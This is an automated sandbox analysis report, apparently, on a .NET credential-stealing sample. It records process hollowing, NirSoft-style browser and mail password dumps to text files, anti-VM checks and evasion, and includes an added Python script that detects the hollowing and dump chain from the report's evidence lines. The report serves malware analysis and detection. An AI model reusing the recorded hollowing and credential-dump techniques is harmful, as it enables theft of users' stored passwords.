Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: FukQGQj7cl.exe Virustotal: Detection: 45%
Source: FukQGQj7cl.exe ReversingLabs: Detection: 35%
Source: unknown Process created: C:\Users\user\Desktop\FukQGQj7cl.exe 'C:\Users\user\Desktop\FukQGQj7cl.exe'
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\FukQGQj7cl.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: FukQGQj7cl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FukQGQj7cl.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: FukQGQj7cl.exe Static file information: File size 1245696 > 1048576
Source: FukQGQj7cl.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12f800
Source: FukQGQj7cl.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000000.297962667.0000000000D62000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: InstallUtil.pdb source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Code function: 16_2_02E4E672 push esp; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_00411879 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_004118A0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00442871 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00442A90 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00446E54 push eax; ret
Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, q6G4/b6TJ.cs High entropy of concatenated method names: '.ctor', 'q0H7', 'Gm6g', 'f1JA', 'Hk3b', 'w8Y2', 'Py2m', 'Zw37', 'n6J5', 'w5D0'
Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, x7H1/Cd25.cs High entropy of concatenated method names: '.ctor', 'Pk4f', 'Tc58', 'Hp8w', 'Ho5e', 'f2SK', 'y7R4', 'm7ZL', 'Zd1t', 'e9Y8'
Source: C:\Users\user\Desktop\FukQGQj7cl.exe File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\FukQGQj7cl.exe File opened: C:\Users\user\Desktop\FukQGQj7cl.exe\:Zone.Identifier read attributes | delete
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Window / User API: threadDelayed 390
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Window / User API: threadDelayed 9400
Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 6020 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 1092 Thread sleep count: 390 > 30
Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 1092 Thread sleep count: 9400 > 30
Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 6020 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6644 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6648 Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6652 Thread sleep time: -54600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 7032 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_004161B0 memset,GetSystemInfo,
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Thread delayed: delay time: 180000
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: VMware
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware vmci bus device!vmware virtual s scsi disk device
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware svga
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vboxservice
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-Vmicrosoft
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware usb pointing device
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware pointing device
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware sata
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware virtual s scsi disk device
Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmp Binary or memory string: vmware vmci bus device
Source: FukQGQj7cl.exe, 00000001.00000002.310032279.000000000137F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 21_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\FukQGQj7cl.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                  Sample uses process hollowing techniqueShow sources
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Writes to foreign memory regionsShow sources
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: ECE008
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
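The "Memory written" and "Process created" entries above describe one chain: FukQGQj7cl.exe writes into a copy of the .NET utility InstallUtil.exe staged in %TEMP% (a PE header at the default 32-bit image base 400000, followed by sections, plus one write far outside that range at ECE008) and then starts it; InstallUtil.exe repeats the pattern twice against vbc.exe, and each vbc.exe instance is launched with /stext, the "save report as text" switch of the NirSoft password-recovery tools, writing holderwb.txt and holdermail.txt. That matches the WebBrowserPassView and MailPassView detections listed in the report. The script below is an added example, not part of the sandbox report or of any vendor tooling; it parses evidence lines in the report's format and reconstructs both findings. The 4 MB image window, the list of .NET host binaries and the staging-directory names are assumptions for the example, and the script only separates the ECE008 write from the section writes without claiming what it is, since the report does not say.

```python
# Added detection example (not part of the sandbox report): rebuild the
# hollowing / credential-dump chain from "Memory written" and "Process
# created" evidence lines written in the report's own format.
import re
from collections import defaultdict

# Constructed sample: a subset of the report's own entries, one per line.
EVIDENCE = r"""
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: ECE008
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
"""

WRITE_RE = re.compile(
    r"Source: (?P<src>.+?)\s+Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)$")
CREATE_RE = re.compile(
    r"Source: (?P<src>.+?)\s+Process created: (?P<img>\S+) (?P<cmd>.*)$")

IMAGE_BASE = 0x400000  # default image base of a 32-bit PE
IMAGE_SPAN = 0x400000  # assumption: writes within 4 MB of it are section writes
# Assumption: .NET framework binaries that malware commonly hollows or abuses.
DOTNET_HOSTS = {"vbc.exe", "installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}
DOTNET_DIR = "c:\\windows\\microsoft.net\\"
USER_WRITABLE = ("\\temp\\", "\\desktop\\", "\\downloads\\")  # assumption: staging dirs


def parse_evidence(text):
    """Return ({(src, dst): {base, ...}}, [(src, image, cmdline), ...])."""
    writes, creates = defaultdict(set), []
    for line in text.splitlines():
        line = line.strip()
        if (m := WRITE_RE.match(line)):
            writes[(m["src"], m["dst"])].add(int(m["base"], 16))
        elif (m := CREATE_RE.match(line)):
            creates.append((m["src"], m["img"], m["cmd"]))
    return writes, creates


def find_hollowing(writes, creates):
    """Flag a write at IMAGE_BASE into a process the writer also started."""
    spawned = {(src, img) for src, img, _ in creates}
    findings = []
    for (src, dst), bases in sorted(writes.items()):
        if IMAGE_BASE not in bases or (src, dst) not in spawned:
            continue
        image = sorted(b for b in bases if IMAGE_BASE <= b < IMAGE_BASE + IMAGE_SPAN)
        # Writes far outside the image (ECE008 above) are not PE sections; the
        # report does not say what they are, so they are only listed apart.
        other = sorted(b for b in bases if b not in image)
        findings.append({"technique": "process hollowing", "parent": src,
                         "hollowed": dst, "image_writes": image, "other_writes": other})
    return findings


def find_suspicious_processes(creates):
    """Framework binaries in odd places, with odd parents, or dumping credentials."""
    findings = []
    for src, img, cmd in creates:
        if img.rsplit("\\", 1)[-1].lower() not in DOTNET_HOSTS:
            continue
        reasons, stext_out = [], None
        if not img.lower().startswith(DOTNET_DIR):
            reasons.append("framework binary running outside the .NET directory")
        if any(d in src.lower() for d in USER_WRITABLE):
            reasons.append("spawned by a parent in a user-writable staging directory")
        m = re.search(r"/stext\s+'?([^'\s]+)'?", cmd)
        if m:  # NirSoft password-recovery tools: /stext <file> = save report as text
            stext_out = m.group(1)
            reasons.append("NirSoft-style /stext credential dump to " + stext_out)
        if reasons:
            findings.append({"image": img, "parent": src, "reasons": reasons,
                             "stext_output": stext_out})
    return findings


def analyze(text):
    writes, creates = parse_evidence(text)
    return {"hollowing": find_hollowing(writes, creates),
            "suspicious_processes": find_suspicious_processes(creates)}


if __name__ == "__main__":
    result = analyze(EVIDENCE)
    for f in result["hollowing"]:
        print(f"[hollowing] {f['parent']} -> {f['hollowed']} sections={list(map(hex, f['image_writes']))} other={list(map(hex, f['other_writes']))}")
    for f in result["suspicious_processes"]:
        print(f"[process] {f['image']}: " + "; ".join(f["reasons"]))
```

Run stand-alone it prints two hollowing findings (FukQGQj7cl.exe into InstallUtil.exe, InstallUtil.exe into vbc.exe) and three process findings, two of them carrying the /stext output paths. The hollowing rule deliberately requires both facts, a write at the image base and the same parent creating the child, because either one alone (a debugger writing memory, a legitimate build spawning vbc.exe) is common on a developer machine.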
Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmp  Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmp  Binary or memory string: Progman
Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Users\user\Desktop\FukQGQj7cl.exe VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\FukQGQj7cl.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
